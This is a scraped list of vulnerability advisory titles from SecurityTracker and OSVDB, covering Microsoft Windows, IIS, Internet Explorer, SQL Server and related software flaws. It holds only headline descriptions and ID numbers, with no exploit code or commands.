Documents [1004587] Microsoft SQL Server 2000 Buffer Overflow in OpenDataSource() Function May Let Remote Users Gain SYSTEM Privileges on the Server [1004569] Microsoft Visual Studio .NET Korean Language Version Contains Nimda Virus [1004544] Microsoft SQL Server Buffer Overflow in 'pwdencrypt()' Function May Let Remote Authorized Users Execute Arbitrary Code [1004542] Lumigent Log Explorer Buffer Overflow May Let Remote Users Crash the Microsoft SQL Server Service or Execute Arbitrary Code on the System [1004541] Compaq Insight Manager May Include a Vulnerable Default Configuration of Microsoft MSDE/SQL Server That Allows Remote Users to Execute Commands on the System [1004529] Microsoft Remote Access Service (RAS) Phonebook Buffer Overflow May Let Local Users Execute Arbitrary Code with Local System Privileges [1004528] Microsoft SQLXML Component of Microsoft SQL Server 2000 Contains an Input Validation Flaw in an XML SQL Tag That Allows Cross-Site Scripting Attacks [1004527] Microsoft SQLXML Component of Microsoft SQL Server 2000 Contains a Buffer Overflow That Lets Remote Users Take Full Control of the System [1004526] Microsoft Internet Information Server (IIS) Heap Overflow in HTR ISAPI Extension While Processing Chunked Encoded Data Lets Remote Users Execute Arbitrary Code [1004518] Microsoft Proxy Server Buffer Overflow in Processing Gopher Protocol Responses Allows Remote Users to Execute Code on the Server to Gain Full Control of the Server [1004517] Microsoft Internet Security and Acceleration Server (ISA) Buffer Overflow in Processing Gopher Protocol Responses Allows Remote Users to Execute Code on the Server to Gain Full Control of the Server [1004486] Microsoft ASP.NET Buffer Overflow in Processing Cookies in StateServer Mode May Let Remote Users Crash the Service or Execute Arbitrary Code on the Server [1004479] Microsoft Internet Explorer May Execute Remotely Supplied Scripting in the My Computer Zone if FTP Folder Viewing is Enabled [1004464] Microsoft Internet Explorer Buffer Overflow in Processing Gopher Protocol Responses Allows Remote Users to Execute Code on the Victim's Computer [1004436] Microsoft Internet Explorer Allows HTML-Delivered Compiled Help Files to Be Automatically Executed on the Target User's Computer [1004407] Microsoft Exchange 2000 Flaw in Processing a Certain Malformed SMTP Command Allows Remote Users to Deny Service to the Server [1004372] Microsoft Excel Spreadsheet XML Stylesheet ActiveX Object Flaw Lets Remote Users Create Malicious Excel Spreadsheets That May Execute Arbitrary Code When Opened With the XML Stylesheet Option [1004369] Microsoft Active Directory May Have Bug That Allows Remote Users to Crash the Directory [1004361] Microsoft Date Engine (MSDE) Default Configuration Leaves Blank Password for System Administrator Account [1004360] Opty-Way Enterprise Glassworks Management Application Installs Microsoft Data Engine Insecurely, Allowing Remote Users to Execute Commands on the System [1004350] Deerfield WebSite Pro Windows-based Web Server May Disclose CGI Source Code to Remote Users in Certain Cases [1004304] Microsoft Internet Explorer (IE) New Content-Disposition Bugs May Let Remote Users Execute Arbitrary Code on the Victim's Computer [1004300] Microsoft Internet Explorer (IE) Zone Spoofing Hole Lets Remote Users Create HTML That, When Loaded, May Run in a Less-Secure IE Security Zone [1004290] Microsoft Internet Explorer Bugs in 'BGSOUND' and 'IFRAME' Tags Let Remote Users Create HTML That Will Cause Denial of Service Conditions or Will Access Special DOS Devices [1004259] Network Associates PGP 'Wipe Deleted Files' Option Fails to Wipe Clear Text Temporary Files Used by the Windows 2000 Encrypted File System Feature [1004251] Microsoft Exchange Instant Messenger ActiveX Control Has 'ResDLL' Parameter Buffer Overflow That Lets Remote Users Execute Arbitrary Code [1004250] Microsoft MSN Messenger Includes an ActiveX Control That Has 'ResDLL' Parameter Buffer Overflow That Lets Remote Users Execute Arbitrary Code [1004249] Microsoft MSN Chat Control ActiveX Control Has 'ResDLL' Parameter Buffer Overflow That Lets Remote Users Execute Arbitrary Code [1004229] Microsoft Office 'Word Mail Merge' Feature Allows Remote Users to Cause Arbitrary Programs to Be Executed on the Target User's Computer [1004226] Microsoft MSN Messenger Instant Messaging Client Malformed Header Processing Flaw Lets Remote Users Crash the Client [1004197] Microsoft Internet Explorer Can Be Crashed By Incorrectly Sized XBM Graphics Files [1004157] Microsoft Outlook Weak Security Enforcement When Editing Messages with Microsoft Word Lets Remote Users Send Malicious Code to Outlook Recipients That Will Be Executed When Forwarded or Replied To [1004146] Microsoft Internet Explorer Browser Can Be Crashed By Remote HTML Containing Malicious Image Tags That Cause Infinite Processing Loops [1004130] Microsoft MSN Messenger Instant Messaging Client Discloses Buddy List to Local Users [1004121] Microsoft Internet Explorer Web Browser Can Be Crashed By Remote Users With OLE OBJECT Element Dependency Loops [1004109] Microsoft Distributed Transaction Coordinator Can Be Crashed By Remote Users Sending Malformed Packets [1004090] Microsoft Back Office Web Administration Authentication Mechanism Can Be Bypassed By Remote Users [1004079] Microsoft Internet Explorer (IE) 'dialogArguments' Flaw Lets Remote Users Conduct Cross-Site Scripting Attacks Against IE Users [1004051] Microsoft Outlook Express for Mac OS Has Buffer Overflow in Processing the 'file://' URL That Allows Remote Users to Cause Arbitrary Code to Be Executed [1004050] Microsoft Office for Mac OS Has Buffer Overflow in Processing the 'file://' URL That Allows Remote Users to Cause Arbitrary Code to Be Executed [1004049] Microsoft Internet Explorer for Mac OS Has Buffer Overflow in Processing the 'file://' URL That Allows Remote Users to Cause Arbitrary Code to Be Executed [1004048] Microsoft Word Object Creation Flaw Lets Remote Users Create ActiveX That Will Consume Memory on the Victim's Computer [1004044] Cisco CallManager Affected by Microsoft Internet Information Server (IIS) Bugs [1004032] Microsoft Internet Information Server (IIS) FTP STAT Command Bug Lets Remote Users Crash Both the FTP and the Web Services [1004031] Microsoft Internet Information Server (IIS) URL Length Bug Lets Remote Users Crash the Web Service [1004014] Microsoft Internet Information Server ASP HTTP Header Processing Buffer Overflow Lets Remote Users Execute Arbitrary Code on the Server [1004011] Microsoft Internet Information Server (IIS) Buffer Overflow in ASP Server-Side Include Function May Let Remote Users Execute Arbitrary Code on the Web Server [1004008] Microsoft Internet Information Server Comes With Code That Allows Remote Users to Conduct Cross-Site Scripting Attacks [1004006] Microsoft Internet Information Server (IIS) Off-By-One Heap Overflow in .HTR Processing May Let Remote Users Execute Arbitrary Code on the Server [1004005] Microsoft Internet Information Server Buffer Overflow in Chunked Encoding Mechanism Lets Remote Users Run Arbitrary Code on the Server [1004002] Microsoft Office Web Components Let Remote Users Determine if Specified Files Exist on Another User's Host [1004001] Microsoft Office Web Components Let Remote Users Gain Full Read and Write Control Over Another User's Clipboard, Even if Clipboard Access Via Scripts is Disabled [1004000] Microsoft Office Web Components Let Remote Users Write Code to Run in the Victim's Local Security Domain and Access Local or Remote Files [1003999] Microsoft Office Web Components in Office XP Lets Remote Users Cause Malicious Scripting to Be Executed By Another User's Browser Even If Scripting is Disabled [1003948] Microsoft Internet Explorer Cascading Style Sheets (CSS) Invalid Attribute Bug Lets Remote Users Read Portions of Files on the Victim's Computer [1003932] Microsoft Office XP Active Content Bug Lets Remote Users Cause Code to Be Executed on an Office User's Computer [1003922] Microsoft Outlook Web Access With SecurID Authentication May Allow Remote Users to Avoid the SecurID Authentication in Certain Cases [1003915] Microsoft Internet Explorer Browser Security Zone Flaw Lets Remote Users Cause Cookie-based Scripts to Be Executed on Another User's Browser in the Incorrect Security Domain [1003907] Microsoft Internet Explorer Discloses The Existence of and Details of Local Files to Remote Users [1003874] Apache Web Server for Windows Has Batch File Processing Hole That Lets Remote Users Execute Commands on the System [1003871] Microsoft .NET Unspecified Vulnerabilities May Allow a Remote User to Cause Arbitrary Code to Be Executed on Another User's Systems [1003856] Microsoft Internet Explorer Can Be Crashed By Malicious 'location.replace' Javascript [1003839] Microsoft Internet Explorer (IE) 6 Lets Remote Users Cause Files to Be Downloaded and Executed Without the Knowledge or Consent of the Victim [1003830] Windows NT and 2000 Session Manager Debug Hole Lets Local Users Obtain Handles to Any Process or Thread to Obtain Elevated Privileges on the System [1003800] A Multitude of Microsoft SQL Server Extended Stored Procedures Have Buffer Overflows That Allow Remote Users to Crash the Database Server or Execute Arbitrary Code on the Server to Gain Full Control of the System [1003756] Microsoft Internet Information Server 4.0 .HTR Web Application Lets Users Change Their Passwords When the NT Security Policy is Configured to Prohibit Password Changing [1003744] Microsoft SQL Server 'xp_dirtree' Buffer Overflow Lets Users Crash the Database Service [1003738] Norton Anti-Virus Corporate Edition Default Configuration for Windows 2000 Lets 'Power Users' Obtain Elevated 'Administrator' Privileges [1003730] Microsoft Java Virtual Machine in Internet Explorer Lets Remote Malicious Applets Redirect Web Proxy Connections [1003688] Microsoft Exchange Server 2000 Command Processing Bug Lets Remote Users Cause the SMTP Service to Crash [1003685] Microsoft Exchange Server Lets Remote Users Send or Relay Unauthorized Mail (including SPAM) Via the Server [1003660] Windows Media Player Executes URLs in Windows Media Files that Have Been Renamed as MP3 Files [1003634] Microsoft XML Core Services in SQL Server 2000 Lets Remote Scripts Access and Send Local Files [1003630] Microsoft Internet Explorer Has Another Frame Domain Security Bug That Lets Remote Users View Files or Other Personal Information from a Victim's Computer By Using Malicious VBScripts [1003629] Microsoft Commerce Server 2000 AuthFilter Buffer Overflow Lets Remote Users Execute Arbitrary Code on the Server With LocalSystem Privileges to Gain Full Control of the Server [1003611] Gator Plugin for Microsoft Internet Explorer Lets Remote Users Install Arbitrary Software on the User's Host [1003605] Microsoft SQL Server Buffer Overflow Lets Remote Users Crash the Server and May Allow Remote Code to Be Executed on the Database Server [1003597] Microsoft Outlook Web Access Discloses 'Include' Archive Files in the 'lib' Directory to Remote Users [1003589] Windows XP Networking Port May Allow Remote Users to Deny Service By Sending a Stream of TCP SYN Packets [1003582] Microsoft Internet Security Acceleration Server Can Be Affected By Remote Users Conducting a LAND Flood Attack [1003556] Microsoft Visual C++ Compiler Buffer Security Mode Does Not Eliminate Buffer Overflows in Compiled Applications [1003546] Microsoft Outlook E-mail Client May Display Potentially Malicious File Attachments Illegally Embedded Within Mail Headers [1003540] Microsoft Internet Explorer Browser MIME Flaw Causes 'text/plain' Pages to Be Displayed as HTML and Any Embedded Scripting to Be Executed By the Browser [1003519] Microsoft Internet Explorer (IE) HTML Directive Buffer Overflow Lets Remote Users Cause Arbitrary Code to Be Executed on Another User's Computer [1003517] Microsoft Internet Explorer (IE) 'Content-Type' Processing Hole Lets Remote Users Open Applications on Another User's Computer [1003516] Microsoft Internet Explorer (IE) Web Browser Has New Frame Domain Verification Bug That Lets Remote Users Obtain Files from Another User's Local File System [1003469] Microsoft Exchange 2000 Server Allows Remote Users to View and Possibly Modify Registry Settings [1003464] PHP for Windows Discloses Path Information to Remote Users [1003462] Microsoft Internet Explorer Web Browser Allows Cross-site Scripting Attacks Via Non-HTTP Servers [1003458] Microsoft Office v. X for Mac OS X Can Be Crashed By Remote Users Sending Malformed Product Identification Packets [1003446] Microsoft Internet Information Server Can Be Stopped By Local Users Removing Virtual Directories in a Shared Hosting Environment [1003436] Windows Messenger (aka MSN Messenger) Instant Messaging Client Discloses Display Name and Contacts to Remote Users [1003434] Microsoft ASP.NET Web Application Framework Allows Cross Site Scritping Attacks and Discloses Path Information to Remote Users [1003433] BlackICE Defender Firewall for Windows Can Be Crashed By Remote Users Sending Large Ping Packets [1003429] mIRC Internet Relay Chat (IRC) Windows Client Buffer Overflow Lets Malicious IRC Servers Execute Arbitrary Code on the Client and Take Full Control of the Client's Host [1003420] Microsoft Site Server Commerce Edition Discloses Potentially Sensitive Administration Information and Source Code to Remote Users With Valid Accounts and Discloses User Passwords from the LDAP Directory to Anonymous Remote Users [1003419] Microsoft Site Server Commerce Edition Lets Remote Users With Valid NT Accounts Upload and Then Execute ASP Scripts on the Server or Consume Disk Space on the Server [1003415] Microsoft Distributed Transaction Coordinator (MSDTC) Service Can Be Crashed By Remote Users [1003382] Windows 2000 TCP Stack Bug Lets Remote Users Cause All Memory to Be Consumed on the Server [1003326] Microsoft Internet Explorer for Macintosh OS Executes Remotely Supplied Commands in AppleScripts [1003224] Microsoft Internet Information Server (IIS) Version 4 Lets Local Users Modify the Log File Undetected [1003215] Microsoft Internet Explorer Popup Object Tag Flaw Lets Remote Users Execute Programs on the Browser's Host [1003135] Microsoft Internet Explorer Can Be Crashed By Remote Users With Javascript That Calls an Endless Loop of Modeless Dialogs [1003129] AOLserver for Windows Discloses Password-Protected Files to Remote Users [1003125] Hosting Controller Windows-based Web Hosting Management Software Lets Remote Users Establish Administrator Accounts and Upload and Execute Arbitrary Code on the Server [1003109] Microsoft Internet Explorer (IE) May Allow Malicious Javascript to Poll a User's System for Known Files [1003104] PHP.EXE Windows CGI for Apache Web Server May Let Remote Users View Files on the Server Due to Configuration Error [1003084] Microsoft Internet Explorer GetObject() Active Scripting Bug Lets Remote Code Access Files on the PC [1003075] ActivePerl for Windows Discloses Directory Path Location to Remote Users [1003050] Microsoft Internet Explorer Web Browser Can Be Crashed By Malicious Image Source Tag Javascript Supplied By Remote Users [1003049] Microsoft Internet Explorer (IE) Text Form Processing Flaw May Cause IE to Crash [1003043] PGP Plug-in For Microsoft Outlook May Fail to Encrypt E-mail in Certain Situations [1003042] Microsoft Internet Explorer Web Browser SSL Security Flaw Lets Remote Users Conduct Man-in-the-Middle Attacks to Access Sensitive Information [1003040] Microsoft Excel Password Protection Flaw Lets Local Users Obtain Contents of Password-Protect Cells [1003033] Microsoft C Runtime Format String Flaw Lets Remote Users Crash the Microsoft SQL Server Service [1003032] Microsoft SQL Server Buffer Overflow Lets Remote Users Execute Arbitrary Code in the Security Context of the SQL Server [1003024] Microsoft Internet Explorer (IE) Web Browser 'document.open()' Scripting Flaw Lets Remote Users Steal Cookies, Read Local Files, and Spoof Web Sites [1002986] Microsoft Internet Explorer Version 6 Lets Remote Scripts Access and Send Local Files [1002973] Microsoft Internet Explorer (IE 6) Browser May Automatically and Silently Execute Arbitrary Code from a Remote Web Site When the User Views a Web Page or HTML-based E-mail [1002968] Citrix ICA Client for Windows Allows Remote Malicious Code to Execute on a User's PC Without Warning [1002957] Microsoft Internet Information Server Can Be Crashed By Remote Users With HTTP Requests Containing Invalid Content-Length Values [1002942] Microsoft Internet Explorer May Execute Javascript Contained Within an 'About:' URL in an Unauthorized Security Domain When the URL Contains an Extraneous '%' Character [1002935] X Windows Temporary File Symlink Error Lets Local Users Deny Service By Overwriting Sensitive Root-Owned Files [1002919] Microsoft Internet Explorer Browser Can Be Crashed By Certain Image Tags [1002915] Microsoft Outlook Web Access for Exchange May Execute Remotely Supplied Scripts When a Recipient Views a Malicious E-mail Message [1002905] Xtel MINITEL Emulator for X Windows Has Symlink Vulnerability That Could Let Local Users Obtain Elevated Privileges [1002885] Microsoft Internet Explorer Can Be Crashed By Malicious Javascript Causing a Stack Overflow in setTimeout() Function [1002823] Microsoft Internet Explorer Fails to Enforce Cookie Prompting Preferences for Local Security Zone [1002820] Microsoft Internet Explorer Allows Malicious Web Pages to Spoof Downloadable File Types And Execute Code on the User's Computer When Opened Directly from the Browser [1002819] Microsoft Internet Explorer ActiveX Flaw Permits Remote Malicious HTML Code Containing an 'htmlfile' or 'htmlfile_FullWindowEmbed' Object to Access Local Files and Potentially Execute Commands [1002802] Microsoft Help and Support Center Software (helpctr.exe) Has Buffer Overflow That May Allow a Remote User to Cause Arbitrary Code to Be Executed on a User's PC [1002778] Microsoft Internet Information Server (IIS) Lets Remote Users Create Bogus Web Log Entries [1002775] Windows Media Player Buffer Overflow in ASF File Processing Lets Malicious Media Files Execute Arbitrary Code on a User's PC [1002772] Microsoft Internet Explorer Cookie Disclosure Fix Discloses Patch Information to Remote Users [1002733] Microsoft IIS 4.0 Configuration Error May Allow Remote Users to Obtain Physical Directory Path Information [1002728] Microsoft SQL Server May Disclose Database Passwords When Creating Data Transformation Service (DTS) Packages [1002702] Microsoft Passport May Disclose Wallet Contents, Including Credit Card and Contact Information, to Remote Users [1002693] Microsoft Internet Security and Acceleration Server UDP Fragmentation Processing Can Cause 100% of CPU Resources to Be Consumed [1002665] Compaq's DECwindows Motif Server for OpenVMS Allows Local Users to Gain Unauthorized Access to Data and System Resources [1002651] Microsoft Internet Information Server (IIS) May Disclose PHP Scripting Source Code [1002641] RSA SecurID ACE/Agent Software for Windows Can Be Forced into Debug Mode By Remote Users Without Authentication, Potentially Disclosing Information to Remote Users When Certain Programs Crash [1002626] Macintosh Cients Using Windows 2000 NTFS Volumes May Modify Directory Permissions in Certain Cases [1002595] Microsoft Internet Explorer Has Fixed Security Zone for about: URLs and Has Shared Cookie Flaw That Diminishes Cross-Site Scripting Protections [1002594] Microsoft Internet Explorer for Mac OS X is Configured to Automatically Execute Downloaded Files [1002581] Microsoft Terminal Servers Can Be Crashed By Remote Users Sending Certain Remote Desktop Protocol (RDP) Packets [1002560] Internet Explorer Sends Potentially Sensitive Web Browser Contents to Microsoft via the Network When an Error Occurs [1002559] Microsoft Office XP Sends Potentially Sensitive Information to Microsoft Via the Network When an Error Occurs [1002526] Microsoft Internet Explorer (IE) Web Browser Has Multiple URL-related Flaws That May Allow for Remote Code Execution, Remote HTTP Request Generation, and Application of Incorrect Security Restrictions [1002487] Microsoft PowerPoint Macro Security Features Can Be Bypassed by Malformed PowerPoint Documents [1002486] Microsoft Excel Macro Security Features Can Be Bypassed by Malformed Excel Documents [1002456] Microsoft Outlook Web Access Directory Validation Flaw Lets Remote Users Consume CPU Resources by Requesting Mail from Nested Folders [1002421] Microsoft Index Server Sample File Discloses File Information to Remote Users [1002413] Microsoft Outlook Express Will Execute Active Scripting in Plain Text E-mail Messages, Circumventing Some Scripting Controls [1002385] Norton Anti-Virus For Microsoft Exchange Discloses User Path Information to Remote Users [1002356] Microsoft Outlook 2000 Animated Assistant Prevents the Screen Saver from Activating, Allowing Physically Local Users to Access the System [1002331] Internet Security Systems RealSecure Intrusion Detection Misses '%u' Encoded Attacks Against Microsoft Web Servers [1002330] Cisco Catalyst 6000 Intrusion Detection System Module Fails to Detect '%u' Encoding Obfuscation Attacks Against Microsoft Web Servers [1002329] Dragon Sensor Intrusion Detection System Does Not Detect Certain Attacks Against Microsoft Web Servers [1002327] Snort Network Intrusion Detection System Will Not Detect '%u' URL Encoding Attacks Against Microsoft Web Servers [1002326] Cisco Secure Intrusion Detection System (NetRanger) Fails to Detect Certain Attacks Against Microsoft Web Servers [1002317] Microsoft DNS Server Software Susceptible to DNS Cache Poisoning in Default Configuration, Allowing Remote Users to Inject False DNS Records in Certain Situations [1002269] Microsoft Outlook Web Access with SSL Can Be Crashed by Remote Users [1002225] Windows 2000 IrDA Infrared Device Driver Lets Infrared Users Crash the System [1002212] Microsoft IIS Web Server Contains Multiple Vulnerabilities That Allow Local Users to Gain System Privileges and Allow Remote Users to Cause the Web Server to Crash [1002206] Microsoft Internet Security and Acceleration (ISA) Server 2000 Can Be Disrupted By Remote Users Due to Memory Leaks and Also Allows Cross-Site Scripting Attacks [1002183] The Matrix Screen Saver for Windows Lets Physically Local Users Bypass the Password Mechanism and Access the System [1002161] Microsoft Internet Information Server (IIS) Web Server Discloses Internal IP Addresses or NetBIOS Host Names to Remote Users [1002159] Windows Media Player ASF Marker Table Overflow Lets Remote Users Crash the Player in Certain Situations [1002134] Identix BioLogon Client for Windows Fails to Secure Screen Saver Logins in Certain Multi-monitor Configurations, Allowing Physically Local Users to Access the System Without Requiring Biometric Authentication [1002105] Microsoft SQL Database Server RPC Input Validation Failure Lets Remote Users Crash the Database Service [1002104] Microsoft Exchange Server RPC Input Validation Failure Lets Remote Users Crash the Exchange Service [1002089] SnapStream Personal Video System for Windows Lets Remote Users Obtain Files on the System, Including One Containing Unencrypted SnapStream Passwords [1002088] Windows Media Player Allows Malicious Media Files to Execute Arbitrary Code on the Player's Host [1002075] Microsoft Services for Unix Memory Leak in Telnet and NFS Services Allows Remote Users to Crash the Operating System [1002048] Windows 2000 May Disclose Descriptive Information To Local Users Attempting Password Guessing with the NetUserChangePassword API [1002028] Microsoft Exchange LDAP Service Can Be Crashed By Remote Users [1002006] Cygwin Tar File Archive Extraction Utility Lets Malicious Tar Files Write to Windows Devices When Extracted [1002005] UnZip Lets Malicious Tar Files Write to Windows Devices When Extracted [1002004] RAR File Archive Extraction Utility Lets Malicious Archives Write to Some Windows Devices on Extraction [1002003] PKZIP Lets Malicious Zip Files Write to Windows Devices When Unzipping Zip Files [1002002] WinZip Utility Lets Malicious Zip Files Write to Windows Devices on Extraction [1001984] Microsoft Outlook Allows Rogue HTML to Execute Arbitrary Commands on the User's Host [1001971] IBM DB2 Database Software for Windows Can Be Crashed By Remote Users [1001923] Microsoft's Internet Information Server's ASP Processor Can Be Crashed by Remote Users in Certain Situations [1001904] vWebServer for Windows Discloses ASP Source Code to Remote Users and Can Be Crashed Remotely [1001819] Microsoft NetMeeting Can Be Crashed By Remote Users [1001818] Microsoft Internet Information Server (IIS) Web Server Discloses ASP Source Code When Installed on FAT-based Filesystem [1001816] Microsoft Visual Studio RAD Support Component of FrontPage Lets Remote Users Execute Arbitrary Code on the FrontPage Server [1001815] Microsoft Word May Execute Macros in Malformed Word Documents Without Warning Even if Macros are Disabled [1001778] Cisco TFTP Server for Windows Discloses Any File on the System to Remote Users [1001775] Microsoft Index Server Lets Remote Users Execute Arbitrary Code With System Level Privileges, Giving Remote Users Full Control of the Operating System [1001763] Rxvt X-Windows Terminal Emulator Lets Local Users Obtain utmp Group Privileges [1001734] Microsoft SQL Server May Let Remote Authenticated Users Take Full Control of the Database Server and the Underlying Operating System [1001727] TrendMicro's InterScan VirusWall for Windows NT Allows Remote Users to Modify the Configuration Without Authentication [1001699] Microsoft Internet Explorer Web Browser May Allow Remote Users to Read Some Text Files on the Browser's Hard Drive [1001696] Microsoft Exchange Server's Outlook Web Access (OWA) Lets Remote Users Execute Arbitrary Code on the OWA User's Web Browser [1001687] Microsoft Outlook Express May Allow A Remote User to Obtain E-mail Destined for a Different User [1001673] Pragma InterAccess Telnet Server for Windows 95/98 Lets Remote Users Crash the Server [1001661] Microsoft Hotmail May Allow a Worm to Send Mail to Other Destinations Listed in a Remote User's Inbox [1001610] HyperTerminal Telnet Client for Windows Allows Local Users to Cause Arbitrary Code to be Executed by the Client [1001576] eEye Digital Security's SecureIIS Application Firewall for Microsoft Web Servers Fails to Filter Certain Web URL Characters, Allowing Remote Users to Bypass the SecureIIS Firewall [1001562] Microsoft Internet Explorer Allows Remote Web Sites to Cause a Different Web URL Address to Be Displayed in the Browser's Address Bar, Allowing Rogue Web Sites to Spoof the Browser and Masquerade as Different Web Sites [1001561] Microsoft Internet Explorer Web Browser Fails To Validate Digital Certificates in Some Configurations, Allowing Rogue Secure Web Sites to Spoof the Browser and Masquerade as a Different Secure Web Site [1001538] Older Version of Microsoft Internet Explorer Web Browser Can Be Crashed By Remote Users [1001537] Microsoft's Internet Information Server's FTP Services May Give Remote Users Information About User Account Names on the Server's Domain and Trusted Domains [1001535] Microsoft's Internet Information Server's FTP Services Can Be Crashed By Remote Users [1001530] Microsoft IIS Web Server Allows Remote Users to Execute Commands on the Server Due to CGI Decoding Error [1001525] Earlier Version of LiteServe Web Server for Windows Can Be Crashed By Remote Users [1001517] Denicomp Systems REXECD Remote Exec Server for Windows Can Be Crashed By Remote Users [1001516] Denicomp Systems RSHD Remote Shell Server for Windows Can Be Crashed By Remote Users [1001512] Microsoft Index Server for NT Can Be Crashed By Local Users, Allows Local Users to Execute Arbitrary Code With System Level Privileges, and Lets Remote Users View Certain Include Files [1001483] Microsoft IIS Web Server Lets Remote Users Restart the Web Server with Another Specially Crafted PROPFIND XML Command [1001445] Microsoft Internet Security and Acceleration Server May Allow Remote Users to Execute Arbitrary Code on the Firewall [1001424] Microsoft Internet Explorer Can Consume All Memory Due to Malicious HTML Code [1001407] WFTPD Pro FTP Server for Windows Allows Remote Users to Crash the Server [Vendor Vigorously Disputes This Claim] [1001402] Microsoft IIS Web Server Can Be Effectively Shutdown By Certain Internal-Network Attacks When The Underlying OS Supports User Account Lockouts [1001396] mIRC Internet Relay Chat Client for Windows Allows Remote Users to Control Other Users' Clients [1001380] Microsoft Internet Explorer and Outlook Express May Execute Arbitrary Code Without User Authorization or Intervention [1001344] Microsoft Internet Explorer May Not Display File Extensions in Certain Cases [1001330] Microsoft ActiveSync Software for Portable Computing Devices Allows Portable Devices to Access Files on a Locked Server [1001319] Microsoft Internet Security and Acceleration Server Can Be Crashed By Remote Users [1001311] Netscape's SmartDownload Can Automatically Execute Arbitrary Code Without User Intervention or Knowledge for Both Netscape and Microsoft Browsers [1001304] Apache Web Server for Windows Lets Remote Users Crash the Web Server Application [1001272] PGP Encryption Software for Windows May Allow Arbitrary Files to Be Created That May Lead to Arbitrary Code Execution [1001255] Microsoft's Ping.exe Allows Local Users to Cause Certain Applications to Crash [1001221] E-Mail Clients that use Microsoft Internet Explorer to Process HTML May Disguise Executable Attachments as Data Files [1001219] Microsoft's Internet Security and Acceleration Server Performance Can Be Significantly Affected By Remote Users Under Certain Configurations [1001216] Microsoft Internet Explorer Can Be Made to Execute Arbitrary Files on the User's Computer [1001213] Tomcat Java Server for Windows Allows Remote Users to List Files Outside of the Server's Root Directory [1001211] TrendMicro's ScanMail E-Mail Virus Scanner for Microsoft Exchange Discloses Administrative System Usernames and Passwords [1001210] Microsoft Internet Explorer Allows Malicious Web Pages to Retrieve Files from the User's Computer [1001209] Microsoft Telnet Can Be Crashed Locally, Causing Other Applications Including Outlook Express To Crash [1001197] Microsoft Internet Explorer May Automatically Execute Certain E-mail Attachments [1001187] Microsoft Internet Explorer Is Vulnerable to Malicious Web Pages That May Obtain the User's Exchange E-mail Messages and May Access Restricted Web Server Directory Listings [1001172] Microsoft Visual Studio Could Allow Users to Crash the Debugger or to Execute Code on the Server [1001163] Microsoft's Dr. Watson Diagnostic Utility May Reveal Passwords and Other Sensitive Information [1001147] Microsoft Outlook Express Crashes When Reading Certain E-mail Messages [1001142] Microsoft Internet Explorer Does Not Check for Revoked Digital Certificates (Two Fraudlent Certificates Are Known to Exist) [1001139] SurfControl for Microsoft Proxy Server May Fail to Block Sites [1001123] Microsoft's FTP Server May Allow Remote Users to Deny Service on the Server [1001116] Microsoft Personal Web Server Contains An Old Internet Information Server (IIS) Vulnerability Allowing Unauthorized Directory Listings and Possible Code Execution For Remote Users [1001088] Microsoft Internet Explorer with Services for Unix 2.0 Can Create Malicious Files on the User's Host [1001087] SSH's Secure Shell for Windows 2.4 Can Be Crashed By Remote Users [1001050] Microsoft IIS 5.0 Web Server Can Be Restarted Remotely By Any User [1000989] Fastream Technologies FTP++ Server for Windows Gives Access to Files and Directories Outside the Server's Main Directory [1000988] TranSoft's Broker FTP Server for Windows Allows File and Directory Access and FTP Command Execution Outside of the Server's Root Directory [1000987] Texas Imperial Software's WFTPD Pro FTP Server for Windows NT/2000 May Execute Arbitrary Code and Can Be Crashed Remotely [1000986] SunFTP (A Windows-Based FTP Server) Allows Read and Write Access to Files and Directories Outside of the Server's Root Directory [1000945] BadBlue's Windows-Based Web Server Can Be Crashed Via the Network and May Display Full Path Names [1000940] Windows 2000's WINMM.DLL Can Locally Crash WINLOGIN.EXE OSVDB - http://www.osvdb.org: [96197] Microsoft Windows TCP/IP Stack Crafted ICMPv6 Packet Handling Remote DoS [96195] Microsoft Windows NAT Driver Crafted ICMP Packet Handling Remote Memory Corruption DoS [96194] Microsoft Windows Asynchronous RPC Request Handling Remote Code Execution [96193] Microsoft Windows Unicode Scripts Processor (USP10.DLL) Uniscribe Font Parsing Engine Unspecified Memory Corruption [96180] Microsoft Windows Kernel Address Value Handling Unspecified Local Memory Corruption (2013-3196) [96179] Microsoft Windows Kernel Address Value Handling Unspecified Local Memory Corruption (2013-3197) [96178] Microsoft Windows Kernel Address Value Handling Unspecified Local Memory Corruption (2013-3198) [95667] Microsoft Windows XP Wireless Preferred Network List (PNL) Remote Disclosure [95589] Microsoft Windows Mobile Wireless Preferred Network List (PNL) Remote Disclosure [94987] Microsoft Windows Defender Improper Pathname Handling Local Privilege Escalation [94986] Microsoft Windows Media Format Runtime Media File Handling Arbitrary Code Execution [94985] Microsoft Windows DirectShow GIF File Handling Memory Overwrite Arbitrary Code Execution [94966] Microsoft Windows win32k.sys Memory Object Dereference Handling Local Privilege Escalation [94965] Microsoft Windows win32k.sys Memory Object Allocation Handling Local Privilege Escalation [94964] Microsoft Windows win32k.sys Memory Object Handling Local Buffer Overflow [94963] Microsoft Windows win32k.sys Memory Object Handling Local Buffer Overflow DoS [94962] Microsoft Windows win32k.sys Memory Object Handling Local Information Disclosure [94961] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation [94126] Microsoft Windows Print Spooler Printer Deletion Memory Handling Local Privilege Escalation [94125] Microsoft Windows TCP/IP Driver TCP Connection Crafted Packet Handling Remote Integer Overflow DoS [94124] Microsoft Windows Kernel Page Fault System Call Handling Local Information Disclosure [93539] Microsoft Windows win32k.sys EPATHOBJ::pprFlattenRec / EPATHOBJ::bFlatten Functions Local Privilege Escalation [93320] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation [93319] Microsoft Windows win32k.sys Memory Object Handling Local Buffer Overflow [93318] Microsoft Windows DirectX Graphics Kernel Subsystem (dxgkrnl.sys) Memory Object Handling Local Privilege Escalation [93317] Microsoft Windows Essentials Windows Writer Crafted URL Handling Arbitrary File Overwrite [93300] Microsoft Windows HTTP Protocol Stack (HTTP.sys) Crafted HTTP Header Handling Infinite Loop Remote DoS [92133] Microsoft Windows NTFS NULL Pointer Dereference Local Privilege Escalation [92132] Microsoft Windows win32k.sys Unspecified Memory Object Handling Race Condition Local Privilege Escalation (2013-1292) [92131] Microsoft Windows win32k.sys Crafted Font File Handling DoS [92130] Microsoft Windows win32k.sys Unspecified Memory Object Handling Race Condition Local Privilege Escalation (2013-1283) [92127] Microsoft Windows Client/Server Run-time Subsystem (CSRSS) Unspecified Local Memory Corruption [92126] Microsoft Windows Multiple Active Directory Components LDAP Crafted Query Handling Memory Consumption Remote DoS [92125] Microsoft Windows Kernel Unspecified Memory Object Handling Race Condition Local Privilege Escalation (2013-1294) [92124] 